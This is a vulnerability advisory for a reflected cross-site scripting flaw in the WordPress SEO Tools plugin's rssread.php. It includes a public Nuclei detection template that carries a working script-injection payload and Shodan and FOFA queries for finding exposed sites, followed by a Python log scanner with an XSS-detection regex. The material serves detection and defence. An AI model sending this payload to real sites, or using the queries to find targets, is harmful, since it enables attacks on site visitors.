CVE-2024-13853: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: WordPress SEO Tools Plugin | PoC: public

Vulnerability description

The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.

PoC code [public]

id: CVE-2024-13853

info:
  name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.
  reference:
    - https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13853
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13853
    cwe-id: CWE-79
    epss-score: 0.00418
    epss-percentile: 0.61119
  metadata:
    max-request: 1
    vendor: WordPress
    product: seo-automatic-seo-tools
    shodan-query: http.html:"seo-automatic-seo-tools"
    fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'seo-automatic-seo-tools'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script><script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402204dda4b53a682653283d8ffde2d1037b0f0da8f17c164f339e5d23568a4a4b09e02204a2c6f3852ff0fef655dd60420c339f21f0fa5e6e96715e0a818c864be6d530c:922c64590222798bb761d5b6d8e72950
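As an added example (not part of the advisory, the Nuclei template, or the SEO Tools plugin), the Python helper below scans web-server access-log lines for probes of the rssread.php 'src' parameter described above, using the plugin path and payload shape from the PoC, and shows what the reflected value looks like once it is HTML-escaped before output, the missing step the description names. The log lines, client addresses and timestamps are constructed, and html.escape is used as a stand-in for the plugin's own escaping call, which this page does not show.

```python
"""Log-side detection helper for CVE-2024-13853 probes (added example).

The access-log lines, client addresses and timestamps are constructed for
this example; only the vulnerable path and the 'src' parameter come from
the PoC template above.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path of the affected script, taken from the PoC request.
VULN_PATH = "/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php"

# Combined log format: client, ident, user, [timestamp], "request line", status, size, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Markers of an attribute break-out or injected markup; the PoC uses '">' then <script>.
XSS_MARKERS = re.compile(r'(<\s*/?\s*script|javascript:|on\w+\s*=|["\'>]\s*<)', re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def src_values(target):
    """Decoded 'src' values of a request, but only for the vulnerable path."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    vals = parse_qs(parts.query, keep_blank_values=True).get("src", [])
    # parse_qs decodes once; a second unquote also catches double-encoded probes.
    return [unquote(v) for v in vals]


def scan(lines):
    """Return (client, timestamp, status, decoded src) for each suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for v in src_values(rec["target"]):
            if XSS_MARKERS.search(v):
                hits.append((rec["client"], rec["ts"], int(rec["status"]), v))
    return hits


def neutralise(value):
    """The reflected value after HTML escaping, i.e. what the page should output.

    html.escape stands in for the plugin's escaping call (assumption); the point
    is that '"' and '<' no longer survive to the browser as markup.
    """
    return html.escape(value, quote=True)


# Constructed sample traffic: one benign feed URL, the PoC probe, an unrelated
# search request with a script tag, and a double-encoded probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET ' + VULN_PATH +
    '?src=https%3A%2F%2Fexample.com%2Ffeed HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET ' + VULN_PATH +
    '?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E'
    ' HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /?s=%3Cscript%3E HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Aug/2025:10:00:04 +0000] "GET ' + VULN_PATH +
    '?src=%2522%253E%253Cscript%253E HTTP/1.1" 404 310 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for client, ts, status, src in scan(SAMPLE_LOG):
        print(f"{ts} {client} status={status} src={src!r}")
        print("  escaped:", neutralise(src))
```

A 200 response whose body echoes the decoded value unchanged is exactly what the template's second request checks for; the log scan cannot see the response body, so it reports every probe of the parameter and leaves confirmation to a test like the one above.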